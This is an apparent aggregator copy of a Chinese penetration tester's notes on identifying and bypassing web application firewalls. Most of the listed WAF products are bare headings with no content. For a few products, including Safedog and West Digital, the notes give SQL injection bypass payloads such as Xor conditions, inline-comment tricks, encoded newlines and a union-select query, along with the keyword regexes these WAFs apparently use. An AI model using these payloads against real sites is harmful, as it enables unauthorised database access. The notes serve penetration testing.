3
WAF的识别与绕过思路
source link: https://827607240.github.io/2020/12/03/WAF/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
WAF的识别与绕过思路 - 302
WAF总结
渗透过程中总会遇到各种各样的WAF,为了方便以后查找资料,先对此进行一些总结。
360网站卫士
Naxsi WAF
云锁v3.1.18.13
Xor绕过
Xor 1=1,Xor 1=2绕过
过滤规则
/**/替换为空
/*!*/替换为空
匹配的关键有:and,or,updatexml,select xxx from,union xxx select
匹配select xx from的正则应该是:select .*? from
匹配union xx select的正则应该是:union .*? select
360主机卫士或360webscan
OpenRASP
腾讯宙斯盾
SDWAF
长亭SafeLine
DotDefender
UPUPW
网防G01
F5 BIG-IP
西部数码WTS-WAF
加号替换空格绕过
bypass:id=1 an%d 1=2 只需要在关键词中加%即可绕过
西部数码云网盾
安全狗v4.0.26550
Xor绕过
Xor 1=1,Xor 1=2绕过
/*/*替换空格绕过
/*/*and/*/*1=2
if 也不拦截
%23a%0a也可以 %23表示# %0a表示换行
union /*!01344select*/ 1,2,3%23绕过
安全狗不拦截/**/之间的内容
bypass:index.php?a=/*&id=1 and 1=2 union select version(),2,3%23*/
过滤规则
会拦截一些关键函数,如user(),databse()
&&替换and绕过,like替换=绕过。
Mod_Security
奇安信网站卫士
铱讯WAF
未知云WAF
可能存在waf(攻击包被丢弃)
本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK